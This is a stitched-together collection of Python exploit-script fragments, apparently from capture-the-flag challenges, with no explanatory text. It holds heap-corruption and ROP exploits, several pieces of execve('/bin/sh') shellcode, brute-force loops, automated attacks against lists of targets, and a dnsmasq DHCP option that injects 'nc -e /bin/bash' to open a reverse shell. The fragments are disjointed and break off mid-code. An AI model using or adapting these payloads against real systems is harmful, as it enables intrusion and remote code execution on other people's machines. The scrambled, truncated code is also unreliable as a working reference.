def launch_pwn(attack_network, gdb_server): p = None if attack_network: p = remote(HOST, PORT) else: fileparams = FILE if gdb_server: fileparams = ['/usr/bin/gdbserver', 'localhost:%d' % GDBPORT, FILE] p = process(fileparams) try: pwn(p) except e: #TODO, real exception handling or something print('Exception ocurred: %s' % str(e)) p.clean_and_log()
def pwn_violately(): leak = True system_addr = 0x0 while leak == True: io = get_io(target, local = local) system_addr = leak_addr(io) if system_addr > 0: leak = False io.kill() while True: try: io = get_io(target, local = local) pwn(io, system_addr) except Exception, e: pass else: pass finally:
def launch_pwn(attack_network, gdb_server, strace): p = None if attack_network: p = remote(HOST, PORT) else: if gdb_server: fileparams = ['/usr/bin/gdbserver', 'localhost:%d' % GDBPORT, FILE] elif strace: fileparams = ['/usr/bin/strace', FILE] else: fileparams = [FILE] for arg in F_PARAM: fileparams.append(arg) p = process(fileparams) try: pwn(p) except Exception as e: #TODO, real exception handling or something print('Exception ocurred: %s' % str(e)) p.clean_and_log() raise e p.clean_and_log()
shellcode_asm = shellcode_asm%asm_info print shellcode_asm print repr(asm(shellcode_asm)) print asm(shellcode_asm).find("\x00") shellcode_bin = asm(shellcode_asm) #shellcode_bin = '\xb8\x01\x01\x01\x015\x01\x01\x01\x01\xff\xc0H1\xd2\x80\xf2\x0cH1\xff\x81\xf7Q\x80a\x01\x81\xf7\x01\x01\x01\x01\x8b?H1\xf6\x81\xf6\xf6\x07A\x01\x81\xf6\x01\x01\x01\x01\x0f\x05H\xb8ogn/uyu\x01P\x814$\x01\x01\x01\x01\x81t$\x04\x01\x01\x01\x01H\xb8/.udru/hP\x814$\x01\x01\x01\x01\x81t$\x04\x01\x01\x01\x01H\x89\xe7H1\xf6H1\xc0\xff\xc0\xff\xc0\x0f\x05H\x89\xc7H1\xf6\x81\xf6\xa1\x80a\x01\x81\xf6\x01\x01\x01\x01H1\xc0\x0f\x05H1\xff\x81\xf7Q\x80a\x01\x81\xf7\x01\x01\x01\x01\x8b?H1\xd2\x80\xf2@H1\xc0H\xff\xc0\x0f\x05' #exit(0) #heap_addr = 0x7f6bec000000 heap_addr = 0x0 if heap_addr == 0: while True: io = get_io(target) heap_addr = leak_addr(io) io.close() if heap_addr & 0xff0000000000 == 0x7f0000000000: break print hex(heap_addr) ret_addr = heap_addr + 0x011110 #raw_input(":") while True: try: io = get_io(target) flag = pwn(io, ret_addr, shellcode_bin) print "get it" break except Exception as e: ret_addr += 0x1000 io.close() raw_input(":")
## file: exp for note ## date: 2018-04-19 ## author: raycp from pwn import * from ctypes import * DEBUG = 1 if DEBUG: #p1 = process('./note') p = remote('127.0.0.1', 1234) #scontext.log_level = 'debug' libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') #p = process(['./babystack.dms'], env={'LD_PRELOAD': os.path.join(os.getcwd(),'libc_64.so.6')}) #libc = ELF('libc_64.so.6') else: p = remote( 'chall.pwnable.tw', 10205, ) libc = ELF('libc_64.so.6') #context.log_level = 'debug' wordSz = 4 hwordSz = 2 bits = 32 PIE = 0 mypid = 0 def leak(address, size): with open('/proc/%s/mem' % mypid) as mem: mem.seek(address) return mem.read(size)
s.send(dat) s.send("\x50\x00\x00\x00") s.send("\x03\x00\x00\x00") s.send("\x00"*(8+8+8)+p64(8)+p64(free_hook)+"\x01") raw_input('') dat = data(0x18, 0x00, 0x05) s.send(dat) dat = data(0x02,0x08,0x05) s.send(dat) dat = data(0x01,0xff,0x03) s.send(dat) s.send(p64(system)) time.sleep(1) raw_input('eof') dat = data(0x05,0x00,0x00) s.send(dat) s.send("\x00\x00\x00\x00") p.success("Get Shell") p = log.progress("eagle") libc_Base = libc_leak(p) #heap_Base, top_Chunk= heap_leak(p) system = libc_Base + 0x46590 free_hook = libc_Base + 0x3c0a10 log.info("free_hook : " + hex(free_hook)) log.info("system : " + hex(system)) pwn(free_hook, system,p)
p.sendline(asm(shellcode)) try: time = 0 for i in range(5): p.sendline('') time = i sleep(0.1) p.close() except Exception as e: time = i p.close() if time > 3: return True return False def pwn(flag): for i in range(30, 50): for j in string.printable: if check(i, ord(j)) == True: if j == '}': return True flag += j print flag break p.interactive() flag = '' pwn(flag) print flag
delete() add(0x40, "\x10\x70") add(0x40, "") add(0x40, p64(0) * 4 + p64(0x0000000007000000)) delete() add(0x40, "") add(0x18, p16(0x2760)) #Debug() payload = "" payload += p64( 0xfbad3c80 ) #_flags= ((stdout->flags & ~ _IO_NO_WRITES)|_IO_CURRENTLY_PUTTING)|_IO_IS_APPENDING payload += p64(0) #_IO_read_ptr payload += p64(0) #_IO_read_end payload += p64(0) #_IO_read_base payload += "\x08" # overwrite last byte of _IO_write_base to point to libc address add(0x38, payload) libc.address = u64(p.recv(6) + '\x00\x00') - 0x3ed8b0 success("libc.address-->" + hex(libc.address)) add(0x18, p64(0) + p64(libc.sym["__free_hook"] - 8)) add(0x7f, "/bin/sh\x00" + p64(libc.sym["system"])) delete() p.interactive() while True: try: p = bin.process(env={"LD_PRELOAD": libc.path}) pwn(p) except Exception as e: p.close()
exit(0) ''' '-'*13 -- c ''.rjust(61, '-') '-'*15 try ''.rjust(63, '-') '-'*12 -- co rjust(60, '-') '-'*14 -- ctry 'y'.rjust(63, '-') ''' cookie = '' for index in range(62)[::-1]: real = pwn( '-' * index)[: 128] for i in '1234567890abcdefghijklmnopqrstuvwxyz-_': now = pwn( cookie.rjust(63, '-') + i)[: 128] if now == real: cookie += i print cookie print len(cookie) break exit(0) i = -1 while True: i += 1
## file: exp for gamebox ## date: 2018-04-26 ## author: raycp from pwn import * from ctypes import * DEBUG = 1 if DEBUG: p = process('./GameBox') #scontext.log_level = 'debug' #libc = ELF('/lib32/libc-2.24.so') #p = process(['./babystack.dms'], env={'LD_PRELOAD': os.path.join(os.getcwd(),'libc_64.so.6')}) lib = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') else: p = remote('39.107.33.43', 13570) libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') #libc = ELF('libc_64.so.6') #context.log_level = 'debug' wordSz = 4 hwordSz = 2 bits = 32 PIE = 0 mypid = 0 def leak(address, size): with open('/proc/%s/mem' % mypid) as mem: mem.seek(address) return mem.read(size) def findModuleBase(pid, mem): name = os.readlink('/proc/%s/exe' % pid)
def pwn_remote(): session = ssh("yeet", "ctf.kaf.sh", password="******", port=7030) conn = session.run("1") conn.read() pwn(conn)
add2(0x68, p64(0) + p64(0x111)) free2(7) add2(0x108, p64(0) * 11 + p64(0x71) + p64(stdin_hook - 0x28)) add2(0x68, 'flag') pop_rdi_ret = libcbase_addr + libc.search(asm("pop rdi\nret")).next() pop_rsi_ret = libcbase_addr + libc.search(asm("pop rsi\nret")).next() pop_rdx_ret = libcbase_addr + libc.search(asm("pop rdx\nret")).next() open_addr = libcbase_addr + libc.symbols["open"] read_addr = libcbase_addr + libc.symbols["read"] puts_addr = libcbase_addr + libc.symbols["write"] orw = p64(pop_rdi_ret) + p64(heap_addr + 0x50) + p64(pop_rsi_ret) + p64( 72) + p64(open_addr) orw += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64( heap_addr + 0x12a8) + p64(pop_rdx_ret) + p64(0x30) + p64(read_addr) orw += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64( heap_addr + 0x12a8) + p64(pop_rdx_ret) + p64(0x100) + p64(puts_addr) payload = p64(0) + p64(libcbase_addr + libc.symbols["_IO_wfile_jumps"] ) + p64(0) + p64(0xfbad1800) + p64(0) * 6 + p64( stack_addr) + p64(stack_addr + 0x100) print "heap_addr=", hex(heap_addr) print "len=", hex(len(payload)) print "stack_addr=", hex(stack_addr) edit(stdin_hook - 0x20, '\x7f') add2(0x68, payload) p.sendlineafter("> ", "5\n" + orw) p.interactive() if __name__ == '__main__': pwn('39.105.231.146', 10016, 1)
def pwn_local(): conn = process(['./CloneWarS']) pwn(conn)
def pwn_local(): conn = process(['./CookShow']) pwn(conn)
def get_flag(host, port): return pwn(host, port, 0)
except-interface=lo dhcp-range={start},{end},22h dhcp-option=3,{ip} dhcp-option=6,{ip} log-queries log-facility=/var/log/dnsmasq.log '''.format(ip=ip, start=start, end=end) f.write(dnsmasq) f.close() cm = [] cm.append('ifconfig eth0 {ip} netmask 255.255.255.0 '.format(ip=ip)) cm.append('route add default gw {ip}'.format(ip=ip)) cm.append( '''dnsmasq -dC dnsmasq.conf --dhcp-option="252,'&nc -e /bin/bash {ip} {port} #"'''.format(ip=ip, port=port)) q = process('bash') for i in range(len(cm) - 1): q.sendline(cm[i]) time.sleep(1) # time.sleep(100) p = process('bash') p.sendline('nc -l -p {port} -v'.format(port=port)) q.sendline(cm[-1]) time.sleep(3) p.interactive() # q.interactive() if __name__ == '__main__': pwn(ip, port)
# coding = utf8 from pwn import * from zio import * target = ('120.27.130.77', 9000) def get_io(target): r_m = COLORED(RAW, "green") w_m = COLORED(RAW, "blue") io = zio(target, timeout=9999, print_read=r_m, print_write=w_m) return io def pwn(io): context(arch='i386', os='linux', log_level='debug') payload = asm("pop edx;mov dl,0xcf;jmp edx;") payload2 = asm(pwnlib.shellcraft.i386.linux.sh()) io.gdb_hint() io.writeline(payload) print disasm(payload2) shellcode = payload2.ljust(4090, 'a') shellcode += shellcode[:5] io.writeline(shellcode) io.interact() pwn(get_io(target))
# Jump into main... Just for the hell of it. main = address + 0xead #0x4b98 stack_pivot = address + 0x3f87 print "Address of stack pivot...", hex(stack_pivot) for i in range(4): # Bit manipulations in order to get the bits from the address that we want. cur_byte = stack_pivot & 0xff << (i * 8) cur_byte = cur_byte >> (i * 8) program_code = "0x0049" + hex(cur_byte)[2:] + "53" codes.append(int(program_code, 16)) ''' codes.append(0x00494153) codes.append(0x00494153) codes.append(0x00494153) codes.append(0x00494153) ''' defeat_checksum(codes) heap_val = heap_leak() defeat_random(heap_val) keyauth_one_defeat() keyauth_two_and_three_defeat() pwn(heap_val) p.sendline('cat /home/project2_priv/.pass') p.interactive()
31 c9 xor ecx, ecx ; initialize f7 e1 mul ecx 51 push ecx 68 2f 2f 73 68 push 0x68732f2f68 68 2f 62 69 6e push 0x6e69622f68 89 e3 mov ebx, esp ; execute address b0 0b mov a1, 0xb ; system_execve() cd 80 int 0x80 ; Linux system call interrupt """ shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' def leak(): recv = s.recvuntil(':') print recv payload = 'a'*20 + addr1 s.send(payload) print 'send:' + payload stackAddr = s.recv(4) print 'stack address is : ' + stackAddr return u32(stackAddr) def pwn(addr): payload = 'a'*20 + p32(addr+20) + '\x90'*10 + shellcode s.send(payload) print 'send : ' + payload addr2 = leak() pwn(addr2) s.interactive()
ebp_addr = 'a' * 8 shellcode = "" #dup 0 shellcode += l64(pop_rdi_addr) + l64(6) shellcode += l64(pop_rsi_r15_addr) + l64(0) + l64(1) shellcode += l64(dup2_addr)# + ebp_addr #dup 1 shellcode += l64(pop_rdi_addr) + l64(6) shellcode += l64(pop_rsi_r15_addr) + l64(1) + l64(1) shellcode += l64(dup2_addr)# + ebp_addr #dup 2 shellcode += l64(pop_rdi_addr) + l64(6) shellcode += l64(pop_rsi_r15_addr) + l64(2) + l64(1) shellcode += l64(dup2_addr)# + ebp_addr #call system binstr shellcode += l64(pop_rdi_addr) + l64(binstr_addr) shellcode += l64(system_addr) pay_load = 'a' * stack_len + ebp_addr + shellcode io.write(pay_load + "\n") io.interact() #target = ('127.0.0.1', 36184) pwn(target) #get_addr(target) pwn3(target)
## file: exp for opm ## date: 2018-04-11 ## author: raycp from pwn import * from ctypes import * DEBUG = 1 if DEBUG: p = process('./opm') #scontext.log_level = 'debug' libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') #p = process(['./babystack.dms'], env={'LD_PRELOAD': os.path.join(os.getcwd(),'libc_64.so.6')}) #libc = ELF('libc_64.so.6') else: p = remote( 'chall.pwnable.tw', 10205, ) libc = ELF('libc_64.so.6') #context.log_level = 'debug' wordSz = 4 hwordSz = 2 bits = 32 PIE = 0 mypid = 0 def leak(address, size): with open('/proc/%s/mem' % mypid) as mem: mem.seek(address) return mem.read(size)
payload += mov payload += pop2ret payload += p32(data + 4) payload += cmd[4:8] payload += mov payload += pop2ret payload += p32(data + 8) payload += cmd[8:] payload += mov payload += sys payload += p32(data) r.sendline(payload) r.interactive() pwn() ''' BUT! You could spawn a shell a lot easier by just returning to libc Example: from pwn import * def pwn(): r = process('./write432') junk = "A"*44 sys = p32(0xf7e31da0) exit = p32(0xf7e259d0) bin_sh = p32(0xf7f52a0b) payload = junk + sys + exit + bin_sh r.sendline(payload)
# The vulnerable server. server = remote("chall.pwnable.tw", 10000) addr_1 = p32(0x08048087) sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" def leak(): payload = "a" * 20 + addr_1 recv = server.recvuntil(':') server.send(payload) stack_addr = server.recv(4) print "Address of stack: " + hex(u32(stack_addr)) return u32(stack_addr) def pwn(addr): payload = 'a' * 20 + p32(addr+20) + sc server.send(payload) stack_addr = leak() pwn(stack_addr) server.interactive()
def main(args): print "kioptrix level 1.1 automatic exploitation utility." if len(args) != 3: sys.exit("use: %s target_ip my_ip" % (args[0])) pwn(target=args[1], my_ip=args[2])
shellcode = ''' push eax pop ebx pop eax pop eax push edx push 0x40 pop edx sub al,0x2e sub byte ptr[eax + 0x23] , dl sub byte ptr[eax + 0x23] , dl push 0x33 pop edx sub byte ptr[eax + 0x22] , dl pop edx push 0x6b pop eax sub al,0x60 ''' shellcode = asm(shellcode) p = process("./death_note") #p=remote("chall.pwnable.tw",10201) #gdb.attach(p,'b *0x8048873') context.log_level = 'debug' add(pwn(0x804a014), shellcode + "\n") add(1, "/bin/sh\n") free(1) p.interactive()
def main(): while 1: # s = process('./start_hard') s = remote('128.199.152.175', 10001) pwn(s)
ip = '159.89.1.177' # change this port = 4001 # change this fname = './shelly' # change this LOCAL = False if LOCAL: r = process(fname) else: r = remote(ip, port) ru = lambda x: r.recvuntil(x) inter = lambda: r.interactive() sla = lambda x, y: r.sendlineafter(x, y) def pwn(): sla(':', '1') sla(':', 'w3t') sc = b'\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05' ru('0x')[:-2] leaked = int(ru(']')[:-1], 16) print('Leaked: 0x{:x}'.format(leaked)) payload = sc.ljust(72, b'\x90') + p64(leaked) sla(':', payload) inter() if __name__ == '__main__': pwn()
create( 'c', 'a', 0x38, 'a' * 8 + p32(0) + p32(0x31) + 'a' * 8 + p32(0) + p32(0x21) + p32(fake_fastbin)) payload = 'a\x00'.ljust(0x100, 'a') + p32(0x64) + p32(1) + p32( heap_addr + 0x1430) + p32(heap_addr + 0x1498) + 'b\x00' edit('a', 1, payload) edit('b', 2, (str(0x18), 'a' * 8)) #control main_arena->top print 'malloc_hook is', hex(malloc_hook) create('d', 'a', 0x18, 'a' * 20 + p32(malloc_hook - 0x8)) edit('a', 2, (str(0x70), p32(system_addr))) payload = 'a\x00'.ljust(0x100, 'a') + p32(0x64) + p32(1) + p32( heap_addr + 0x1440) + p32(heap_addr + 0x1498) + 'b\x00' edit('a', 1, payload) #gdb.attach(p, open('debug')) #call malloc('/bin/sh') which equals to system('/bin/sh') edit('b', 2, (str(bin_sh), p32(system_addr)), True) if getshell: p.interactive() else: run(p, "./backdoor") if __name__ == '__main__': pwn('127.0.0.1', getshell=False)
free(1) free(3) payload = p32(0x0) + p32(0x81) + p32(heap_base + 0x18 - 12) + p32(heap_base + 0x18 - 8) + p32(0x80) #chunk0 payload = payload.ljust(0x80,"6") payload += p32(0x80) + p32(0x80) #chunk1 payload = payload.ljust(256,"9") payload += p32(0x80) + p32(0x81) #chunk2 add(len(payload),payload) free(1) payload = "a"*20 add(len(payload),payload) showlist() system_addr = libc + lib.symbols['system'] binsh_addr = libc + next(lib.search("/bin/sh\x00")) add(0x50,0x50*"a") payload = "\x250\x00\x00" + p32(1)+p32(0x4) + p32(elf.got['free']) + p32(1) + p32(0x14) + p32(heap_base+0xc280) + p32(1) + p32(0x8) + p32(heap_base + 0xda8) + p32(0) + p32(heap_base + 0xB80) + p32(0) payload = payload.ljust(0x108,"\x00") edit(0,0x108,payload) edit(0,4,p32(system_addr)) edit(2,8,"/bin/sh\x00") showlist() free(2) log.success("libc: " + hex(libc)) log.success("heap_base: " + hex(heap_base)) log.success("system_addr: " + hex(system_addr)) log.success("binsh_addr: " + hex(binsh_addr)) sh.interactive() if __name__ == "__main__": #nc pwn2.jarvisoj.com 9885 pwn("pwn2.jarvisoj.com",9885,0)
overwrite_notetable(heap_addr) edit_note(0, p64(0x100) + p64(1) + p64(0x8) + p64(atoi_got) + "a" * (0x300 - 32), 0x300) system_addr = libc_addr - 3672200 edit_note(0, p64(system_addr), 8) #get shell ru(': ') sl('/bin/sh') io.interactive() if __name__ == '__main__': global io if DEBUG: io = process('./freenote') #io = remote('127.0.0.1', 4000) pause() pwn() else: f = open(sys.argv[1], 'r') targets = f.readlines() for target in targets: io = remote(target, int(sys.argv[2])) resp = pwn() sendflag(resp) exit(0)
payload += call_func( elf.got['read'], address_of_page, page_size, rwx ) # return to syscall with $rax = 0xa, which means mprotect(0x601000, 0x1000, 0x7); payload += p64(shellcode_addr) p.send(payload.ljust(0x400, '\x00')) #sleep(1) p.send(shellcode.ljust(0x40, '\x00')) p.sendline(read_ow) p.send('ls\n') #print p.recvline() if p.recvline(): #if succeed, it will recv, else return. p.interactive() else: p.close() #print 'ee' return if __name__ == '__main__': #pwn(0x9e) for i in range(0, 256): #brute the last byte. print i try: pwn(i) except: pass ##ASIS{n0_exec_stack_slapped_ma_f4c3_hehe_____}
shellcode += "\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" io.send(shellcode + "\n") print io.recvuntil("> ") io.send("3\n") print io.recvuntil("\n") io.send("nihaoa\n") print io.recvuntil("\n") #addr = int(raw_input("name_addr:"), 16) #search_heap(io, addr) name_addr = leak_heap(io, 10) - 0x20 print io.recvuntil("> ") io.send("4\n") print io.recvuntil("n)") print io.send("n\n") print io.recvuntil("> ") io.send("3\n") print io.recvuntil("\n") call_addr = p64(name_addr) io.send(call_addr * 4) io.interactive() io = get_io(target, local=local) pwn(io)
shellcode_list.append("%02x"%((ord(c) ^ opcode2)&0xff)) else: shellcode_list.append("%02x"%((ord(c) ^ opcode1)&0xff)) shellcode = "".join(shellcode_list) payload += shellcode + "00" print payload if fromfile == True: file_w = open("exp.dat", 'w') file_w.write(payload + "\n") file_w.close else: io.write(payload + "\n") io.interact() #data = run_cmd("objdump -d -M x86-64 binary1_3\n") #print get_info(data) #exit(0) """ #local target = "./binary1" io = get_io(target) pwn(io, fromfile = True) """ #remote io = get_io(target) pwn(io, fromfile = False)
def get_io(target): ELF("./precision") io = zio(target, timeout = 9999, print_read = COLORED(RAW, 'green'), print_write = COLORED(RAW, 'blue')) return io def pwn(io): io.read_until("Buff: ") stack_addr_str = io.read_until("\n") stack_addr = int(stack_addr_str, 16) print "stack_addr:", hex(stack_addr) print "cmp_val_addr", hex(stack_addr + 0x80) cmp_value = l64(0x40501555475a31a5) ebp = l32(0x00) ret_addr = l32(stack_addr) shellcode = "\xb0\x46\x31\xc0\xcd\x80\xeb\x07\x5b\x31\xc0\xb0\x0b\xcd\x80\x31\xc9\xe8\xf2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68" shellcode = "\xeb\x16\x5e\x8a\x06\x31\xc9\x8a\x5c\x0e\x01\x80\xeb\x07\x88\x1c\x0e\x41\x38\xc8\x75\xf1\xeb\x05\xe8\xe5\xff\xff\xff\x18\x38\xc7\x57\x6f\x36\x36\x7a\x6f\x6f\x36\x69\x70\x75\x90\xea\x38\xd0\x90\xd1\x71\x12\x5f\xd4\x87"; print disasm(shellcode) payload = shellcode.ljust(0x80, '\x90') + cmp_value + 'a' * 8 + ebp + ret_addr io.gdb_hint() io.write(payload + "\n") io.interact() io = get_io(target) pwn(io)
from pwn import * server = remote("chall.pwnable.tw", 10000) sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" addr_1 = p32(0x08048087) def leak(): payload = 'a' * 20 + addr_1 recv = server.recvuntil(':') server.send(payload) stack_addr = server.recv(4) print(stack_addr) #0x804809d print("Address of stack: " + hex(u32(stack_addr))) return u32(stack_addr) def pwn(addr): payload = 'a' * 20 + p32(addr + 20) + sc server.send(payload) addr_2 = leak() pwn(addr_2) server.interactive()
libc_base = u64( view( 0 )[-8:] ) - unsorted_libc heap_base = u64( view( 0 )[:8] ) realloc_hook = libc_base + realloc_hook_libc global_max_fast = libc_base + global_m_fast_libc excve_sh = libc_base + excve_sh_libc entry_head = libc_base + pie_off + 0x203060 log.info('&global_max_fast='+hex(global_max_fast)) log.info('&heap_base='+hex(heap_base)) log.info('&entry_head='+hex(entry_head + 5 *24 )) insert( 'a' * 8 ) update( 0, 'a'*8 + p64( global_max_fast - 0x10 ) ) insert( 'b' * 8 ) merge( 4 , 4 ) update( 8 , p64( entry_head + 5*8*3 ) * 2 ) insert( '1' * 8 )#这次分配还是在entry4的位置,下次就可以分配到伪造的entry_head上面去 insert( 'x' * 120 ) rand_key = u64 ( view( 9 ) [96:96+8] ) ^ ( entry_head + 5*8*3 )#泄漏出rand_key, print hex( rand_key ) payload = 'a' * 8 + p64 ( 1 ) + p64( 8 ) + p64( ( realloc_hook + 0x30 ) ^ rand_key ) #计算出要改写的realloc_hook的偏移 update ( 9 , payload ) update ( 6 , p64( excve_sh ) )#把realloc_hook改成libc中执行system(/bin/sh)的地方 p.sendlineafter ( 'Your choice: ' , '2' ) p.sendlineafter ( 'Entry ID: ' , '0' ) p.sendlineafter ( 'Length of entry: ' , '1314' )#触发realloc p.interactive() if __name__ == '__main__' : pwn()
if index & 1 == 1: shellcode_list.append("%02x" % ((ord(c) ^ opcode2) & 0xff)) else: shellcode_list.append("%02x" % ((ord(c) ^ opcode1) & 0xff)) shellcode = "".join(shellcode_list) payload += shellcode + "00" print payload if fromfile == True: file_w = open("exp.dat", 'w') file_w.write(payload + "\n") file_w.close else: io.write(payload + "\n") io.interact() #data = run_cmd("objdump -d -M x86-64 binary1_3\n") #print get_info(data) #exit(0) """ #local target = "./binary1" io = get_io(target) pwn(io, fromfile = True) """ #remote io = get_io(target) pwn(io, fromfile=False)